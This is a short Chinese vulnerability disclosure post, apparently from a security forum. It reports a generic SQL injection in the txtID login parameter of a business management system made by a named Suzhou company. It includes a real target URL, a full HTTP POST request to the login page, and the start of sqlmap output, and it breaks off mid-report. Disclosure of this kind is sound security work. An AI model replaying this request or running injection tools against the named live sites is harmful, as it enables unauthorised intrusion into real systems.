红黑网友(游客) |
2015-01-16 09:30 |
某业务管理系统存在通用型SQL注入漏洞
苏州赛思科技有限公司 开发的星联盟综合业务管理系统
系统txtID参数存在注入
6个案例证明:
1、http://www.sciencesoft.com.cn/Login.aspx
POST /Login.aspx?ReturnUrl=/UI HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://www.sciencesoft.com.cn/Login.aspx
Content-Length: 119
Content-Type: application/x-www-form-urlencoded
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts
Host: www.sciencesoft.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
btnLogin=edqbdbmr&txtID=1&txtPwd=1&__VIEWSTATE=/wEPDwUKMjAwOTY4Mjc0OWRkwR2ccAPcAKsE%2bLjfk0vNHuZ9o6/u4G05gw0yP0aHBg0%3d
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
阅读全文地址:/Article/201411/353842.html |
|